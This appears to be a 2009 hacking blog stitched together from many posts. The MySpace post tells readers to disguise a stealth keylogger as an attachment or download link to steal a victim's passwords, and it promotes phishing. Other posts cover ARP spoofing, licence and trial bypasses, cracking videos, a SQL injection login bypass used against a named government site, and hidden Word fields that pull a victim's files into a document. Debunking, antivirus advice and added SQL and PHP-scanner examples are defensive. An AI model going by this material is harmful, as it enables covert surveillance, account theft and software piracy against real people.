Sunday, 20 September 2009

Hack MySpace Account


MySpace is one of the most widely used social networking websites among teenagers and adults across the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post you’ll find the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready-made software or program that can hack Myspace just by entering the target username or URL. If you come across a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams.

The following are the only 2 foolproof methods to hack Myspace.

1. How to Hack Myspace – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called spy software or a spy program.

2. Where is keylogger program available?

There are tons of keyloggers on the internet, but most of them are useless and don’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspace since it supports remote installation. This can also be used on a local computer.

SniperSpy

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation, the keylogger becomes completely invisible and starts running in the background. Because of its stealth behaviour the victim can never come to know about the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer, because SniperSpy offers a Remote Installation Feature. So, you can hack Myspace by remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What is the best way to deploy the keylogger onto remote PC?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and runs it, the keylogger will get installed automatically.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link

SniperSpy

2. How to Hack Myspace – Other Ways

Phishing

Phishing is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled into believing the fake Myspace page to be the real one and enters his/her password. But once the user attempts to log in through these pages, his/her Myspace login details are stolen.

Speed Up PC


Are you fed up with your slow PC? Well, you can speed up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I’ll split this post into 2 parts.

1. Automatic Ways to Speed Up PC (Using PC Speed Up Softwares)

2. Manual Ways to Speed Up PC

Automatic Ways to Speed Up PC

You can use a PC Optimizer Tool to automatically boost the speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix up to 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the startup etc. This can speed up your PC and Internet speed by up to 3 times. Here are some of the best PC Optimizer programs that I recommend.

1. Perfect Optimizer

2. Registry Easy

Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.

Manual Ways to Speed Up Your PC

1. Free Up Disk Space to increase the speed of your PC

  • Remove temporary Internet files.
  • Empty the Recycle Bin.
  • Remove Windows temporary files.
  • Uninstall Programs that you no longer use.

2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.

3. Clean Up your Registry (Highly Recommended)

Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately you cannot do this manually. You have to use a Registry Cleaner to do this. Here is the best registry cleaner on the web.

Registry Easy

A complete review of registry cleaners can be found at Registry Cleaner Reviews

4. Clean Up the browser cache to Speed Up your Internet.

5. Install a good Antispyware software

Spyware can really hurt the performance of your PC. So, install a good anti-spyware program to protect your PC from spyware and improve the speed of your PC. I recommend the following anti-spyware programs to protect your PC.

1. Spyware Cease

2. Nodware Anti-Spyware

Which is the Best Way to Speed Up my PC? (Auto or Manual)

The best way to speed Up your PC is by using a PC Optimizer such as Perfect Optimizer or Registry Easy. This is because, manual ways can only perform 30-40% of the tweaks to improve the speed of your PC, but the most important aspect of the Speed Up process such as Registry clean Up and other advanced performance tweaks can only be done using a PC Optimizer software. So if you are serious about improving the speed of your PC, then you need to use a PC Optimizer.

Thursday, 17 September 2009

How to hack someone's computer with Cain and Abel


Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.


Cain & Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else that plans to use it for ethical reasons.

Status with virus scanners

Some virus scanners, notably Avast!, detect Cain and Abel as malware: "Win32:Cain-B [Tool]". It is classified in Avast! as "Other potentially dangerous program". The author and owner of oxid.it states that his programs are not malware. Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner will stop Cain from functioning. The latest version of Avast no longer blocks

How to hack someone's computer using Cain and Abel



The latest version is faster and contains a lot of new features like APR (ARP Poison Routing), which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocol authentication monitors and route extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.
I have put a link for the Cain and Abel free download.

Features:
1. WEP cracking
2. Speeding up packet capture speed by wireless packet injection
3. Ability to record VoIP conversations
4. Decoding scrambled passwords
5. Calculating hashes
6. Traceroute
7. Revealing password boxes
8. Uncovering cached passwords
9. Dumping protected storage passwords
10. ARP spoofing
11. IP to MAC Address resolver
12. Network Password Sniffer
13. LSA secret dumper

Warning: This tutorial, How to hack someone's computer with Cain and Abel, is truly for educational purposes.

How to Fix Your Infected Computer

Is your PC infected by a virus, spyware, etc.? Does your PC take a long time to start? Are you looking for tools to fix your infected computer? Then this post is just for you.
I get asked this question frequently: "How to fix your infected computer". I have posted here many ways to fix your infected computer and make it start faster.

How to fix your infected computer



Here are some steps you need to take when fixing your infected computer:


Antivirus software

1. Kaspersky

It is one of the best antivirus programs available on the web. Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers, malicious tools and auto-dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network" service.

2. Avira

Avira uses very little CPU and is quite compact. Avira Free is much better than Avira Premium even though it offers web filter and mail filter.

3. AVG

AVG is one of the most used antiviruses nowadays. Most of all, it is free and includes antispyware too. It is very light and does not take up too much disk space.

4. Norton

Quite slow if you have 512 MB or 1 GB of RAM; only users with 2 GB or 3 GB of RAM are advised to use this software. But it is extremely good at virus detection and does not leave a single trace of any damage. It detects 90% of viruses, but it is not better than Kaspersky.

Antispyware:



Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Antispyware is the second step to fix your infected computer. Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer.

Here is a list of some antispyware programs which I would recommend:

1. Ad-Aware Free Anniversary Edition 8.0.7:
It finds spyware files and helps you remove them quickly and easily. You can choose which modules to remove, keep files from the registry, and personalize the program's menu.

2. a-squared Free 4.5.0.8:
Also known as a², it specializes in detecting and removing malware (all types of harmful files). As of today, a-squared detects and removes more than 24,000 trojans, 67,000 worms, 40,000 dialers, 11,000 spyware and 70,000 traces or signatures.

3. Malwarebytes Anti-Malware:

This antispyware scans the disks in search of malware, with the option of removing it. It can be scheduled to scan the PC at a certain hour. It has a list for files in quarantine and a list of files to ignore. It is possible to activate real-time protection (it detects threats before they enter the system), which is a paid feature.

Others include Spyware Blaster, Spy Defence, etc.

Registry scanner:


Next you need a registry scanner to fix your infected computer. Viruses often copy their algorithm into a registry entry, so you are only 50% done after you delete the virus.
There are many registry cleaners available, such as:

1. Eusing Free Registry Cleaner/scanner
2. Registry fix
3. Auslogics registry cleaner (my recommendation)

Trojan horse removal:



For this you can read my post on "Trojan horse removal"

Ccleaner:


After that you can download CCleaner and optimize your computer's speed by deleting unwanted registry entries, internet tracking cookies and temporary files.

Bonus:

Anti-Malware Toolkit - a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.

Help keep your computer safe, secure and clean from malware - get the Anti-Malware Toolkit today!

Download anti malware tool kit here

Use Kaspersky antivirus without a key


Kaspersky is one of the world's best antiviruses, but unfortunately its full version is not available. There are many keys available online, but believe me, these only waste your time; all your efforts will end in smoke. I am posting here a method to use Kaspersky antivirus without a key (a temporary solution if your key is not valid).
Just follow the steps:

You need to back up first in case anything goes wrong.

1.( Run ) type ( regedit ) press ( OK ).

1- Go To ( HKEY_LOCAL_MACHINESOFTWAREKasperskyLabAVP6Data ) & right click on ( Data ) & choose ( Permissions ).

2- choose ( Advanced ) From The ( Permissions For Data ) ... a new window will open.

3- On ( Advanced Security Settings for Data ) window .. look for ( Inherit from parent ... ) click on the nike or check mark to remove or uncheck it.

4- After removing the check or nike mark you will get a new message .. choose ( Remove ).

5- On ( Advanced security Settings for Data ) click on ( Apply ).

6- choose ( Yes ) for the new message that you will get.

7- Press ( OK ) on ( Advanced security Settings for Data ).

8- Press ( OK ) on ( Permissions For Data ).

9- Exit KasperSky & restart it again.

The Kaspersky icon will be GRAY but it is working perfectly.
- You will have to update the database manually ... no automatic update.
- Ignore Windows Security Center saying that the antivirus is not working ... in fact it is active.

How to run a Trial Software Forever

Today I will show you two ways to hack software and run trial software forever.
Most of us are familiar with software that runs only for a specified period of time in trial mode. Once the trial period has expired, the software stops functioning and demands a purchase. But there are ways to run the software and make it function beyond the trial period.

When such software is installed for the first time, it makes an entry in the Windows Registry with details such as the installation date and time, the installation path, etc. Every time you run the software after installation, it compares the current system date and time with the installation date and time, and so can work out whether the trial period has expired. RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date; it only injects the date/time that you specify into the desired application. RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.

How to run trial software forever - Method

You have to follow these tips carefully to successfully hack software and make it run in its trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period has expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.

4. It is better and safer to inject the date of the last day in the trial period.

For example, if the trial period expires on Jan 30 2009, always inject the date as Jan 29 2009 in RunAsDate.

Problems with this hack

Although this hack works on most software, there is still some software on which it won't work:

1. This will not work for antivirus software, since the antivirus needs to run in the background all the time. RunAsDate cannot be used with any antivirus.

2. This will not work for software that requires autorun on startup. But it works on most software…

3. You cannot run software that has a limited number of executions with this hack.

4. You cannot run a keylogger with this hack.

Alternate method: Run trial software forever

As I told you above, this hack won't work on antivirus, autorun-on-startup software, keyloggers, etc.
I have an alternate method for such software.
"CrackLock" is a program that allows us to indefinitely extend the probationary period of shareware programs that have a time limit. It works by making the program believe that the date remains constant. Simple and effective.

CrackLock 3.8.1

How to Protect an email account from the SPAM


Most of us get SPAM every day. Some of us get more and some less. Even a newly created email account will start receiving spam just a few days after it was created. Many times we wonder where the spam is coming from and why, but the question remains unanswered. So, in this post I will do my best to provide information about spam and tell you how to combat it.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media and digital delivery systems) to send unsolicited bulk messages indiscriminately. The most widely recognized form of spam is email spam.

Where is SPAM coming from?

Spam comes only from spammers and never from a legitimate user or company. These spammers send an email to hundreds (or even thousands or millions) of email addresses at one time. They either send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main objective of spammers is to send spam (unsolicited bulk messages) to as many people as possible to make a profit. For example, John builds a small site to sell an ebook that gives information about weight loss. In order to make sales he needs publicity for the website. Instead of spending money on advertising, John decides to create an email containing information about the site along with a link, and sends this email to 100 email addresses in his contact list. If 1 person out of a hundred buys the book, John gets $10. What if he sends the email to 1000s of email addresses? He gets $100. Imagine: if he sent this email to 1 million email addresses he would earn $100,000.

Now I hope you understand the idea behind spamming. In order to make money, spammers advertise by email as much as possible, without any respect for the privacy of the recipient.

Where do spammers get my email address?

On the Internet there are many sites that collect people's email IDs and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take surveys; this is when the scam sites get their email addresses. Also, many spammers collect email addresses using spambots. Spambots collect email addresses from the Internet in order to build mailing lists. Spambots are web crawlers that can gather email addresses from web sites, newsgroups, forums, special interest group (SIG) postings, and chat room conversations.

Spammers also use the trick of creating hoax emails to gather a large list of email IDs. For example, a spammer sends a hoax email that says "Forward this message to Help Burned Children". This email claims that 11 cents will be donated to the children's family every time the message is sent to someone else. Most people believe this and start forwarding the hoax email to all the IDs in their contact list. In this way the email spreads quickly, and when it eventually reaches its creator (the spammer), the spammer has a large list of valid email addresses in the email header. When you get this kind of hoax email, you can see for yourself that the email header contains a large list of email addresses of all the people to whom the email was forwarded. This is one of the effective methods used by spammers to collect email addresses.

Is spamming legal?

Spamming is in fact illegal. But it is very difficult to stop spammers, because they keep moving from one hosting company to another after getting banned. This makes it nearly impossible to catch spammers and bring them to justice.

How to protect my email account from getting SPAMmed?

The following methods can be used to combat spam emails.

1. Use a spam filter for your email account. If you use email services like Gmail, Yahoo, Hotmail, etc., then a spam filter is used by default. Each spam filter has its own algorithm to detect spam and will automatically move it to the SPAM folder. This keeps your inbox free from spam. However, some spam emails still succeed in making their way through the filter into the inbox.

2. Do not post your email address in public forums, user comments and chat-rooms. Provide your email address only to Web sites that can be trusted when you sign up for the newsletter.

3. While taking online surveys and filling out feedback forms, it is better not to give your personal email address. Instead, sign up for a dummy email account and use it for surveys and feedback forms.

4. When posting your contact email address on your website, use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This will protect your email address from being indexed by spambots.

5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use the "Bcc" (blind carbon copy) option to send the email. This will hide all the email IDs to which the message is forwarded.

Malaysia country's birthday, hackers from


Coinciding with the 52nd anniversary of Malaysia's independence, Indonesian hackers and defacers united and attacked sites originating from Malaysia. The hackers claim to have defaced approximately 100 sites from Malaysia. According to them, this action is meant as a warning to Malaysia to no longer disturb Indonesian culture. "We enliven Malaysia's birthday in our own way, namely by mass-defacing the sites of the country," wrote a hacker on one of the successfully defaced sites. The hackers said they were from IndonesianCoder Team and ServerIsDown. Some of the successfully defaced sites are the official site of the Teachers Association of Sarawak (stu.org.my), bagsmalaysia.com, globalmarine.com.my, mgpskuantan.edu.my and dozens of other sites. Most of these Malaysian sites are still in a defaced state, but some have been successfully repaired and can be accessed properly. (srn) Source: okezone.com

The source included a list of the Malaysian sites that were hacked.

This is the result of the claims on cultural issues made by Malaysia ...
It turns out that Indonesian hackers also have a sense of nationalism ... in the end they did something like the above ... whether it is right or wrong ... this is proof that Indonesia has a lot of very clever people ...

Hacking Email Password



Most people ask me to teach them the easiest way to hack email passwords. In fact, most of the questions I get asked about hacking are in some way related to hacking email passwords. If you have a similar question in mind, here is the answer. First of all, do not be fooled by the so-called "easiest way to hack email password" given on many scam sites. Here is the scam procedure. This method of hacking passwords never works.
- --

>> STEP 1 - Log in to your account (yahoo, hotmail, gmail, etc.)

>> STEP 2 - Click on the Compose

>> Step 3 - In the subject type exactly as follows

Password Retrieval

>> STEP 4 - In the To address, type exactly the following email address

retrieve_mypass@yahoo.com (for yahoo)
send_mypass@hotmail.com (for hotmail)
googlepass_reset@gmail.com (for gmail)

>> STEP 4 - The body of the mail

In the first line type in your own email address and the password on the next line.

NOTE: This step is the most important, so do exactly as instructed.

Here's an example

myemailid@yahoo.com
iamafool

Give exactly 4 lines gap after this.
Now type the email addresses of people you want to hack.
On the next line type the following code exactly as given below

Yyb67hhfy ** yssyhhdiuhhyahoo.comsi * @ # 8?? "(for yahoo)

Yyb67hhfy ** yssyhhdiuhhhotmail.comsi * @ # 8?? "(for hotmail)

Yyb67hhfy ** yssyhhdiuhhgoogle.comsi * @ # 8?? "(for gmail)

>> STEP 5 - Now send the mail and check your inbox after a few hours. The victim's password is sent to you by the password-resetting server. This is a major bug in most hosts like yahoo, gmail, etc. Here the server gets confused and sends you the victim's password.
ENDS PART ----<>----

Never try this trick. If you try it you'll lose your own password. Let's see how this mail works.

First of all, the "To" address of the mail is nothing but the ID of the person who wrote this trick. This address has no special value; it is just an ordinary user email address like yours, not a server email address. So you are simply sending your own mail ID and password to a stranger in an effort to hack other people's passwords. All the other rules, such as the line gaps and the code, are nonsense, given only to make you believe it's true. So the point is: never trust or try these hacks. This method is called Social Engineering, in which people are made to send their own mail username and password to the hacker's ID. So here people get deceived and lose their own passwords in an attempt to hack other passwords.

Actual ways of hacking passwords involve the use of a keylogger program. A keylogger is a program that uses stealth to hide its existence while secretly recording all keystrokes, including passwords. Other ways of password hacking involve the use of a trojan, a fake login page, etc. These tricks are discussed in detail in the post Hacking An Email Account, which includes the full details of email hacking.

Tuesday, 15 September 2009

PHP SECURITY - CHECKING PHP SCRIPTS FOR BUGS


Once a PHP script we have written is finished, there are times when unwanted bugs lurk in the script that is about to be put online. And of course such a bug can be fatal, because it can be used by intruders, including automated ones, who seek to exploit the system.

And who can say for sure that a PHP script that has been written is safe from security vulnerabilities? :D~~~

So how do you prevent hackers from exploiting, or even damaging, your website? How do you find out whether the script you have created has a fatal bug, and how do you handle it all? :D

Before we move on to the next step, it is a good idea to identify the most popular bugs that are often exploited.

The author will try to give some explanation of bugs often found in web-based applications, in particular Content Management Systems and others. Among them:

- XSS (Cross Site Scripting)
- SQL Injection
- RFI (Remote File Inclusion)

Cross Site Scripting
Better known as XSS. This error occurs because there is no filtering of HTML and JavaScript.

Basically, the defacing (content change) happens on the client side only. The most fatal aspect of this bug is that you can steal cookies and then use them to do something that ... :D~~

Examples:
Censored [sorry]

SQL Injection
SQL injection happens because an attacker tries to inject an SQL query via a form or via the address bar of the Internet browser. For example, the author tried to log in as admin on the South Sumatra government site (http://www.sumsel.go.id). By using the query ' or 1=1 -- the author logged in successfully. In essence, ' (a single quote) and or 1=1 -- serve to confuse the SQL server, so that the SQL server runs the query "select *". What happened is that the author got through the login as admin.

Here is a picture the author captured after managing to log in as admin to the site http://www.sumsel.go.id

This picture was taken before the author contacted the webmaster via email to patch his PHP script.
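
The login bypass described above, reproduced against a throwaway in-memory database beside the parameterized form that stops it. This is an added example, not code from the original post; it uses Python's sqlite3 in place of the site's PHP and SQL server, and the table, accounts and function names are constructed for the illustration.

```python
import sqlite3


def make_db():
    """In-memory user table holding constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    # Plaintext passwords only keep the demo short; a real application
    # stores a salted password hash instead.
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "constructed-pass"), ("o'brien", "pw2-constructed")])
    return db


def build_concatenated_query(username, password):
    """The flawed pattern: form input is pasted straight into the SQL text."""
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_concatenated(db, username, password):
    """Login check using the concatenated query (vulnerable on purpose)."""
    try:
        row = db.execute(build_concatenated_query(username, password)).fetchone()
    except sqlite3.Error:
        return False  # a stray quote in the input produced malformed SQL
    return row is not None


def login_parameterized(db, username, password):
    """Login check with bound parameters: input is data, never SQL syntax."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


# The input quoted in the text above: the quote closes the string literal,
# "or 1=1" makes the WHERE clause true for every row, "--" comments out the rest.
PAYLOAD = "' or 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(build_concatenated_query(PAYLOAD, "anything"))
    print("concatenated :", login_concatenated(db, PAYLOAD, "anything"))
    print("parameterized:", login_parameterized(db, PAYLOAD, "anything"))
    # A legitimate name containing a quote breaks the concatenated version too.
    print("o'brien, concatenated :", login_concatenated(db, "o'brien", "pw2-constructed"))
    print("o'brien, parameterized:", login_parameterized(db, "o'brien", "pw2-constructed"))
```

In PHP the same fix is a prepared statement with bound parameters (PDO or mysqli) instead of building the query string from form input.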

RFI (Remote File Inclusion)
First, please read up on the functions require, require_once, include, and include_once. RFI itself occurs because of a programmer's mistake when coding, namely using variables in these functions. When a user enters the URL of his evil script into the variable used in the require or include function, the evil script can be executed remotely; in other words, the attacker can run commands on your server to change the site content or even damage it. :D~~

For examples, please look at www.milw0rm.com :D~

The keyword is Remote File Inclusion. :D~

Checking BUG
Checking for bugs can be done manually. Hmmm ... that will of course take a lot of time. There are tools that can quickly and automatically find bugs left in a PHP script by accident or deliberately. :D~

Basically, bug checking can be done online or offline. The author suggests that bug checking be done on your localhost (offline) only.

Check XSS Bug
The tool for checking your own PHP scripts for XSS is a Mozilla Firefox add-on available for free. Its installation is fairly easy, and here is how to use it.

This tool can be downloaded here:
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Check SQL Injection Bug
At present, defacing via SQL injection ranks as the favourite and certainly the most widely used method, perhaps because the attack is fairly easy to carry out with just a basic knowledge of SQL syntax. Once again, a Mozilla Firefox add-on that is quite powerful and easy to use is available for checking for SQL injection bugs. :D

You can download it here:
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

It is not too difficult to use.

Check BUG Remote File Inclusion
First, download the script here: http://www.newhack.org/dl_jump.php?id
After that, download ActivePerl; this interpreter will be used to run the script inclusionscanner.pl.
Then copy inclusionscanner.pl to the directory c:\perl\bin

The next steps:

1. Put the PHP scripts to be scanned into a directory under c:\perl.

ex: c:\perl\wordpress.

2. Open a command prompt: Start | Run | cmd | Enter

3. After that, go to the directory c:\perl\bin: cd c:\perl\bin

4. Run the script:

C:\Perl\bin> perl.exe inclusionscanner.pl
# Will check a directory for all includes and unsets
# Coded by Ironfist (ironsecurity.nl)
# Usage: Create a folder in your perlfolder and put the files to be scanned in it
# Next type the folder name below (eg myfolder)
# Gives Errors Checking WHEN subfolders: Ignore THEM Smile
Directory to read? c:\perl\wp

Then see the results in c:\perl\bin\result.html

The following are the scan results from when the author ran the inclusion check on WordPress 2.3.3:

FOUND: require_once($locale_file);
in c:\perl\wp/wp-settings.php
FOUND: require_once($import_root . '/' . $file);
in c:\perl\wp/wp-admin/import.php
FOUND: include_once($this->PluginDir . "class-smtp.php");
in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($lang_path.'phpmailer.lang-en.php');
in c:\perl\wp/wp-includes/class-phpmailer.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php
FOUND: require_once($_template_file);
in c:\perl\wp/wp-includes/theme.php

Wow! :D Please patch whatever is exploitable in your own scripts. :D
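A minimal static check in the spirit of the scanner run above, written here as an added example (it is not inclusionscanner.pl and does not reproduce its logic). It goes one step further and separates includes whose path can be traced to request input from those that merely use a variable, since a hit such as include($template) is a lead for review rather than proof of a bug; the sample PHP and all function names are constructed.

```python
import os
import re

# Match string literals (kept) or comments (blanked out, newlines preserved
# so that reported line numbers still match the original file).
TOKEN_RE = re.compile(
    r'''("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')|(/\*.*?\*/|//[^\n]*|#[^\n]*)''',
    re.S)
# include/require statements, but not $include variables or ->include() methods
INCLUDE_RE = re.compile(
    r'(?<![\w$>])((?:include|require)(?:_once)?)\b\s*\(?([^;]*);', re.I)
ASSIGN_RE = re.compile(r'(\$[A-Za-z_]\w*)\s*=(?!=)([^;]*);')
VAR_RE = re.compile(r'\$[A-Za-z_]\w*')
REQUEST_VARS = {"$_GET", "$_POST", "$_REQUEST", "$_COOKIE"}


def strip_comments(src):
    def repl(match):
        if match.group(1):
            return match.group(1)
        return re.sub(r"[^\n]", " ", match.group(2))
    return TOKEN_RE.sub(repl, src)


def request_tainted(code):
    """Variables assigned (directly or through another variable) from request data."""
    tainted = set(REQUEST_VARS)
    for match in ASSIGN_RE.finditer(code):
        if tainted & set(VAR_RE.findall(match.group(2))):
            tainted.add(match.group(1))
    return tainted


def scan_php(src):
    """Return (line, statement, verdict) for each include/require using a variable."""
    code = strip_comments(src)
    tainted = request_tainted(code)
    findings = []
    for match in INCLUDE_RE.finditer(code):
        used = set(VAR_RE.findall(match.group(2)))
        if not used:
            continue  # constant path: nothing a visitor can influence
        verdict = "request-controlled" if used & tainted else "variable"
        line = code.count("\n", 0, match.start()) + 1
        findings.append((line, " ".join(match.group(0).split()), verdict))
    return findings


def scan_tree(root):
    """Scan every .php file under root; yields (path, line, statement, verdict)."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    for finding in scan_php(handle.read()):
                        yield (path,) + finding


# Constructed sample input, not taken from WordPress or any real project.
SAMPLE = r"""<?php
// include($_GET['old']);  commented out, must not be reported
require_once('wp-config.php');
$page = $_GET['page'];
$file = $page . '.php';
include($file);
include($template);
"""

if __name__ == "__main__":
    for line, statement, verdict in scan_php(SAMPLE):
        print("line %d: %-22s %s" % (line, statement, verdict))
```

A "request-controlled" hit is the pattern the RFI section describes and should be replaced by a fixed path or an allow-list lookup; a "variable" hit needs a manual check of where the variable is set.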

Remember: do no damage and do not vandalize. If you find bugs in other sites as I have mentioned above, please let the

CD Video Hacking and Cracking Software Free


There are times when someone who is enthusiastic about learning network security gets tired of reading the material, because reading basically requires sustained attention, perhaps with a furrowed brow. :D This time I will try to offer you something more relaxed. :D Yes, of course, an explanation of a hacking or cracking technique on video is much easier to understand than reading about it, although it also has many weaknesses. Someone who watches a video of a hacking technique should of course already understand the concept behind that technique. Besides showing hacking techniques, for those of you who want to learn how software is cracked to get a CD key, license, or serial number, a complete video lesson is included. Please download it for free:
http://rapidshare.com/files/174700524/Cr4k.h4ck.Tut.part1.rar
http://rapidshare.com/files/174700648/Cr4k.h4ck.Tut.part2.rar
http://rapidshare.com/files/174700526/Cr4k.h4ck.Tut.part3.rar
http://rapidshare.com/files/174700610/Cr4k.h4ck.Tut.part4.rar
http://rapidshare.com/files/174700440/Cr4k.h4ck.Tut.part5.rar
http://rapidshare.com/files/174700301/Cr4k.h4ck.Tut.part6.rar

Monday, 14 September 2009

Hack microsoft office

This article is just to make u aware of known existing threats,
for educational purposes only.


I have stumbled onto a couple of potential security issues in Microsoft
Word that I would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. I am fairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.


Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.


1) Document collaboration spyware.



Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker the file will also include
contents of another file(s) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field
into the document. The field results in inclusion of a specified file
into the current document. Of course, Hacker must be careful to include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and in my opinion cleaner), she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.


Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
